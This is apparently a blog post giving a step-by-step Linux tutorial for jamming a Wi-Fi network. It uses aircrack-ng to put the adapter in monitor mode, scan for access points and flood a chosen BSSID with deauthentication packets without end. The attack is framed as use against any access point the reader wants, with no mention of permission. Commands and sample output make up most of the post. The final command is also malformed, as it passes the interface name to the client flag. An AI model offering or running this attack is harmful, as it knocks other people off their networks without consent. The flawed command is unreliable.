I am posting this method for Linux but I suppose this will work on Windows too.
FIRST: You will need aircrack-ng. The method of installing it is different for every Linux distribution. In Ubuntu you can install it by issuing following command in terminal window:
sudo apt-get install aircrack-ng
SECOND: After installing it we need to find out if our network adapter is detected by system or not.
Issue following command in terminal window to get a list of detected adapters:
sudo airmon-ng
This will show an output like this:
Zer0C00l@ASUS-PC:~$ sudo airmon-ng
Interface Chipset Driver
wlan0 Intel 965CDX iwl3965 – [phy0]
Interface Chipset Driver
wlan0 Intel 965CDX iwl3965 – [phy0]
It may show other adapters like eth0, eth1 and so on, but we need only wlan0 (e.i. the Wireless Adapter).
THIRD: Now we need to put our Wireless card to monitor mode, issue following command in terminal window:
sudo airmon-ng start wlan0
which will show a message “monitor mode enabled on mon0″, where mon0 is a new interface which we will use for monitoring.
FOURTH: Now we need to find out which networks are available from our location. Make sure you are as close to your desired access point as possible and issue this command in terminal:
sudo airodump-ng mon0
Note down the BSSID (MAC address) of the access point you want to attack.
FIFTH: The final step! Issue following command in terminal:
sudo aireplay-ng -0 0 -a 00:AB:6C:CD:40:70 -c mon0
Where,
-0 is for deAuthentication.
0 (zero) is for continuously sending deAuthentication packets.
-a 00:AB:6C:CD:40:70 is the BSSID of Access Point you want to attack.
mon0 is the monitor interface we created earlier.
We will get an output like this:
20:10:02 Sending DeAuth to broadcast — BSSID: [00:AB:6C:CD:40:70]
20:10:02 Sending DeAuth to broadcast — BSSID: [00:AB:6C:CD:40:70]
20:10:03 Sending DeAuth to broadcast — BSSID: [00:AB:6C:CD:40:70]
20:10:03 Sending DeAuth to broadcast — BSSID: [00:AB:6C:CD:40:70]
20:10:02 Sending DeAuth to broadcast — BSSID: [00:AB:6C:CD:40:70]
20:10:03 Sending DeAuth to broadcast — BSSID: [00:AB:6C:CD:40:70]
20:10:03 Sending DeAuth to broadcast — BSSID: [00:AB:6C:CD:40:70]
No comments:
Post a Comment